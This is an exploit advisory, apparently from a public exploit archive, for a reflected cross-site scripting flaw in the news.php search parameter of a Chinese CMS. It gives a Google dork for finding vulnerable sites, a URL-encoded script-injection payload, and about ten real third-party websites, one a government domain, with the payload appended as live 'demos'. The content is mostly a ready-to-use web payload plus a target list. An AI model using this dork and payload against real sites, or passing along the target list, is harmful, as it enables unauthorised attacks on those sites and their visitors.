######################
# Exploit Title : 江苏网路神在线 CMS Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.eweb.cn/
# Google Dork : intext:" 设计维护:江苏网路神在线 "
# Date: 23 May 2016
# Tested On : Kali
# Contact:n3t.hacker@gmail.com
##########M############
# Vulnerable File : news.php
# Request Method: GET
# Describe : Search dork and select Target. Put /news.php After url such as :
# http://site.com/news.php
# Now Add :
# ?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
# : http://site.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
# OK :)
#
#
# Demo :
# http://www.csnl.gov.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
# http://csasia.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
# http://gemmusical.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
# http://www.ayjk.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
# http://www.yebusi.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
# http://www.csbjct.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
# http://www.tianxiatex.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
# http://jsxhfz.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
# http://changgong-cs.com/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
# http://www.bxzs.com.cn/news.php?keyWord=1%27%22%28%29%26%25%3Cacx%3E%3CScript%3Ealert%28/Ashiyane.org/%29%3C/script%3E
#
#
#
#
#
######################
# discovered by : Net Hacker
######################